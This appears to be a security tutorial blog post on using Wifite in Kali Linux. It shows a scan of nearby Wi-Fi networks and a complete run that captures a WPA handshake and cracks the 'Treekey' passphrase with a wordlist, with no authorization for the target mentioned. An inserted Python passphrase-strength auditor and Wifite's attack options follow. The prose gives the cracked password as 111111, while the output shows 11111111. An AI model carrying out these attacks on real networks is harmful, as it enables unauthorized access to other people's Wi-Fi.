Day 27 Wireless Attacks (Wifite)

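Today's tool is Wifite. It advertises that one simple command, with no tedious steps or extra parameters, is enough to automatically scan for and crack Wi-Fi passwords, and it supports several standards: WEP, WPA and WPS. Without further ado, let's try it.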

Wifite is in Kali's 06-Wireless Attacks category. Running it directly shows how it is used:

sudo wifite

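The output can be read as several blocks. The first shows basic information about the tool, including the version and author, and then lists any recommended packages that are not installed.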

   .               .    
 .´  ·  .     .  ·  `.  wifite2 2.5.2
 :  :  :  (¯)  :  :  :  a wireless auditor by @derv82
 `.  ·  ` /¯\ ´  ·  .´  maintained by kimocoder
   `     /¯¯¯\     ´    https://github.com/kimocoder/wifite2

 [!] Warning: Recommended app bully was not found. install @ https://github.com/aanarchyy/bully
 [!] Warning: Recommended app pyrit was not found. install @ https://github.com/JPaulMora/Pyrit/wiki
 [!] Warning: Recommended app hashcat was not found. install @ https://hashcat.net/hashcat/
 [!] Warning: Recommended app hcxdumptool was not found. install @ https://github.com/ZerBea/hcxdumptool
 [!] Warning: Recommended app hcxpcaptool was not found. install @ https://github.com/ZerBea/hcxtools
 [!] Warning: Recommended app macchanger was not found. install @ apt-get install macchanger

The next block shows the interface entering monitor mode, which is why the NetworkManager process was ended.

 [!] Conflicting processes: avahi-daemon (PID 635), NetworkManager (PID 640), wpa_supplicant (PID 673), avahi-daemon (PID 698)
 [!] If you have problems: kill -9 PID or re-run wifite with --kill
 [+] Using wlp2s0mon already in monitor mode 

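Wifite then enters the scanning phase. You can press Ctrl + C to interrupt the scan, after which Wifite asks which target to use. Here I entered 3, the one named Treekey.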

   NUM                      ESSID   CH  ENCR   POWER  WPS?  CLIENT                               
   ---  -------------------------  ---  -----  -----  ----  ------
     1                  ken-2.4G     1  WPA-P   43db    no                                       
     2                 cheng1230     6  WPA-P   43db    no                                       
     3                   Treekey    13  WPA-P   22db  lock    1                                 
     4                     LIANG    11  WPA-P   22db    no                                       
     5                  chandler     6  WPA-P   22db    no                                       
     6                 ASUS 2.4G     6  WPA-P   17db  lock                                       
     7                     dong4     1  WPA-P   16db   yes                                       
     8          huangfamily-2.4G     1  WPA-P   16db   yes                                                                                                                                       
 [+] select target(s) (1-16) separated by commas, dashes or all: 3      

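What follows is a series of cracking attempts. At the end it produces a .cap file and cracked.txt, and you can see that the password 111111 was cracked.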

[+] (1/1) Starting attacks against AA:AA:AA:AA:AA:AA (Treekey)
[+] Treekey (50db) WPS Pixie-Dust: [4m56s] Failed: Because access point is Locked               
[+] Treekey (54db) WPS NULL PIN: [4m56s] Failed: Because access point is Locked                 
[+] Treekey (44db) WPS PIN Attack: [5s] Failed: Because access point is Locked                 
[!] Skipping PMKID attack, missing required tools: hcxdumptool, hcxpcaptool
[+] Treekey (47db) WPA Handshake capture: Discovered new client: AA:AA:AA:AA:AA:AA             
[+] Treekey (45db) WPA Handshake capture: Captured handshake                                   
[+] saving copy of handshake to hs/handshake_Treekey_2021-10-12T21-22-06.cap saved

[+] analysis of captured handshake file:
[+]   tshark: .cap file contains a valid handshake for AA:AA:AA:AA:AA:AA
[!] aircrack: .cap file does not contain a valid handshake
[+] Cracking WPA Handshake: Running aircrack-ng with wordlist-probable.txt wordlist
[+] Cracking WPA Handshake: 0.01% ETA: 1m47s @ 1898.7kps (current key: 11111111)               
[+] Cracked WPA Handshake PSK: 11111111

[+]   Access Point Name: Treekey
[+]  Access Point BSSID: AA:AA:AA:AA:AA:AA
[+]          Encryption: WPA
[+]      Handshake File: hs/handshake_Treekey_2021-10-12T21-22-06.cap
[+]      PSK (password): 11111111
[+] saved crack result to cracked.txt (1 total)
[+] Finished attacking 1 target(s), exiting
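
The run above ends with a dictionary hit after 0.01% of the wordlist, so the defensive check is on the passphrase itself. The following is an added example, not part of the original post or of Wifite: it audits a candidate WPA passphrase before it is set on an access point. The function names, the 365-day threshold and the small sample wordlist are assumptions; the rate is the figure from the aircrack-ng line above, read as keys per second.

```python
import string

PAGE_RATE = 1898.7   # keys/second, from the aircrack-ng progress line on this page
MIN_DAYS = 365       # assumed policy threshold, not from the page
# Constructed stand-in for a real dictionary such as wordlist-probable.txt
SAMPLE_WORDLIST = {"password", "12345678", "11111111", "qwertyui"}

def charset_size(psk):
    """Size of the smallest set of standard character pools covering psk."""
    pools = (string.ascii_lowercase, string.ascii_uppercase,
             string.digits, string.punctuation + " ")
    return sum(len(p) for p in pools if any(c in p for c in psk))

def is_trivial(psk):
    """True for one repeated character or a straight up/down run (abcdefgh)."""
    steps = {ord(b) - ord(a) for a, b in zip(psk, psk[1:])}
    return steps in ({0}, {1}, {-1})

def exhaust_days(psk, rate=PAGE_RATE):
    """Days to try every string of psk's length over its character pools."""
    return charset_size(psk) ** len(psk) / rate / 86400

def audit_psk(psk, wordlist=SAMPLE_WORDLIST, rate=PAGE_RATE):
    """Return the failed checks for a candidate PSK; empty list means none."""
    findings = []
    if not 8 <= len(psk) <= 63:
        findings.append("length outside the 8-63 characters WPA-PSK accepts")
    if any(not 32 <= ord(c) <= 126 for c in psk):
        findings.append("contains characters outside printable ASCII")
    if is_trivial(psk):
        findings.append("repeated or sequential characters")
    if psk in wordlist:
        findings.append("present in the wordlist")
    if exhaust_days(psk, rate) < MIN_DAYS:
        findings.append("keyspace exhaustible in under %d days" % MIN_DAYS)
    return findings

if __name__ == "__main__":
    for candidate in ("11111111", "12345678", "correct-horse-battery-staple"):
        print(candidate, audit_psk(candidate) or "no findings")
```

The rate on this page comes from a CPU run, and dedicated cracking hardware is much faster, so the day estimate is an upper bound.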

That is the simplest way to use Wifite. For other usage, see wifite -h, for example the options for specific modes:

WEP:
  --wep                                      Show only WEP-encrypted networks
  --require-fakeauth                         Fails attacks if fake-auth fails (default: off)
  --keep-ivs                                 Retain .IVS files and reuse when cracking (default: off)

WPA:
  --wpa                                      Show only WPA-encrypted networks (includes WPS)
  --new-hs                                   Captures new handshakes, ignores existing handshakes in hs (default:
                                             off)
  --dict [file]                              File containing passwords for cracking (default: /usr/share/dict/wordlist-
                                             probable.txt)                                                                                                                                                                                   

WPS:
  --wps                                      Show only WPS-enabled networks
  --wps-only                                 Only use WPS PIN & Pixie-Dust attacks (default:
                                             off)
  --bully                                    Use bully program for WPS PIN & Pixie-Dust attacks (default:
                                             reaver)
  --reaver                                   Use reaver program for WPS PIN & Pixie-Dust attacks (default:
                                             reaver)
  --ignore-locks                             Do not stop WPS PIN attack if AP becomes locked (default:
                                             stop)

